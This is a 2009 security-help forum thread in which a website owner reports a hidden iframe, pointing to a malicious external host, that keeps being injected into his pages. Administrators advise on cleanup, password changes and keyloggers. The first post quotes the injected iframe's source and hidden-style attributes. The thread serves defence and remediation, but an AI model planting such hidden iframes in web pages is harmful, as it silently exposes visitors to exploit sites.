Author Topic: It instals it's self in my index.htm file on my website  (Read 15307 times)

0 Members and 1 Guest are viewing this topic.

June 13, 2009, 04:16:59 pm
Read 15307 times

kris

  • Jr. Member

  • Offline
  • **

  • 13
Hi guys I'm new here just joined today.I hope to find help for the fallowin problem -the fallowing link- it  starts with a "<iframe " tag and then goes ----src="http://nyfilmlife.cn:8080/index.php" width=185 height=191 style="visibility: hidden">" -----and then it ends up with </iframe> " tag . It instals it's self to my index.htm file on my website and "eats up" 1/3 some times 1/2 of my text there.What can I do to make it go away.I erased it few times but it keeps comming .I wrote to my host but still no responce.Thanks for the help in advance.Kris

MysteryFCM: URL disabled

June 13, 2009, 04:36:38 pm
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1689
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Chances are the code putting it there is in some of your other files.

First and foremost, please replace ALL files on your server with clean copies, and change ALL passwords for your siite (including FTP).
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 13, 2009, 04:40:55 pm
Reply #2

kris

  • Jr. Member

  • Offline
  • **

  • 13
Thanks,I'll start with that- changing my password.Why didn't it cross my mind before?I was looking around and all other files seem to be ok.Thanks again I'll go do it right now.Chhers.Kris

June 13, 2009, 04:50:16 pm
Reply #3

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1689
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Can you post your sites URL?

If your site uses a database, this will also need checked.

I'd also recommend scouring your site for any files that look suspicious, or have a date on or since, the problem began.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 13, 2009, 04:56:32 pm
Reply #4

kris

  • Jr. Member

  • Offline
  • **

  • 13
www.krissviconte.com is my modest musician website.I noticed it a few weeks ago.It might have been there before as well .I don't think it has data base.

June 13, 2009, 04:57:50 pm
Reply #5

kris

  • Jr. Member

  • Offline
  • **

  • 13
it always comes to www.krissviconte.com/index.htm and to the identical one krissviconte.com/main.htm ---thanks for your time and effort once again.

June 13, 2009, 05:40:54 pm
Reply #6

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1689
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Has the site already been cleaned? (not seeing any malicious codes there)

I checked both your .css and .js file, and neither are carrying anything malicious either.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 14, 2009, 03:47:14 am
Reply #7

CM_MWR

  • Special Members
  • Hero Member

  • Offline
  • *

  • 319
It also appears cleaned from here as well, most curious what they did other than change passwords?

June 14, 2009, 06:37:43 am
Reply #8

kris

  • Jr. Member

  • Offline
  • **

  • 13
Hi ,
I just erased the frame line and changed my password -nothing else.Let's see for how long it's going to last.Anyway google has registered my website as malicious and everytime someone does a search for it (or my name) it shows the link and a warning that it's dangerous to theyr computer.!!!how about that.It will take probably months before they "release me"...thanks again to all.
Kriss

June 14, 2009, 09:28:51 am
Reply #9

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3326
Ruining the bad guy's day

June 14, 2009, 03:07:34 pm
Reply #10

kris

  • Jr. Member

  • Offline
  • **

  • 13
Yes I did request but now this "thing" is there again if you go to www.krissviconte.com/index.htm and www.krissviconte.com/main.htm it's there on the last line before the last 2 tags and it has eaten up the last few lines of my text.I wonder will that change if I change the host server?It happened before on that server that -they say - it was attacked by hackers and my website content was erased completely- just dissapeared. I don't want to write this code here because i don't know if I'll transfer it to you that way. it starts with  <iframe src="http    ....etc  and finnishes with </iframe>

June 14, 2009, 03:14:17 pm
Reply #11

kris

  • Jr. Member

  • Offline
  • **

  • 13
It also appears cleaned from here as well, most curious what they did other than change passwords?

Hi Steven now this "thing" is again there -if you have time you can see and tell me how to "kill " it www.krissviconte.com/index.htm and also on www.krissviconte.com/main.htm
will that come again if I change the  host server and clean everything before that.From the server they're writing me this :"Hi,

Nobody can access your account to make changes to your site without the correct password. If you suspect someone has gained access to your password, you may need to log in at http://www.budgethostingweb.com and change it.

We're sorry we can't find this link or text on the pages you mention. This doesn't happen when we view the pages so it is probably something on your local computer. You may need to check your antivirus software to see if there is a problem there."

and also this " Hi,

Unfortunately it is possible for spyware on your local computer to steal passwords or manipulate files. We're sorry we don't know if this is the cause or source of your problem, however there have been no unauthorized accesses to our system or your account. We run ironclad security to prevent unauthorized access.

If there is a problem with your site or pages, it has been caused by an upload from a source outside our system, perhaps your local computer.

We're sorry we can't help with problems outside our system. If Firefox is blocking your page, you may need to follow the instructions at:
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US
&site=http://www.krissviconte.com/"
I'm really confused what to do.I depend on my site so much for my work.

June 14, 2009, 04:27:03 pm
Reply #12

kris

  • Jr. Member

  • Offline
  • **

  • 13
Now I found one file in my base directory that shouldn't be there ( i think) it's called Lware.class and deleted it I also deleted the "<iframe " thing from both pages - let's see if this was the problem...

June 14, 2009, 05:02:24 pm
Reply #13

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1689
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I've checked your site again using several different user agents, on the off chance it was trying to hide itself based on that, and I'm afraid I still cannot see anything malicious there.

Have you changed your FTP password already? (prior to it's appearing again)

Did you check ALL of the files on your sites FTP server, to ensure all files are those you recognize?

If you answered yes to the above, chances are you've got a keylogger on your machine that keeps sending the attacker the new password and/or the attacker has placed a shell on your site, that you've missed, that will allow them to re-attack your site (these are typically .pl, .asp or .php files).
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 14, 2009, 05:32:43 pm
Reply #14

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1689
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
It should also be noted, the infection that was present on your site, leads to exploits (PDF etc). As such, if you are doing any of this from the machine you used to load the site - STOP!. Use a clean machine (i.e. one that has not accessed your site since these issues began). Passwords and files etc, should be changed from there.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net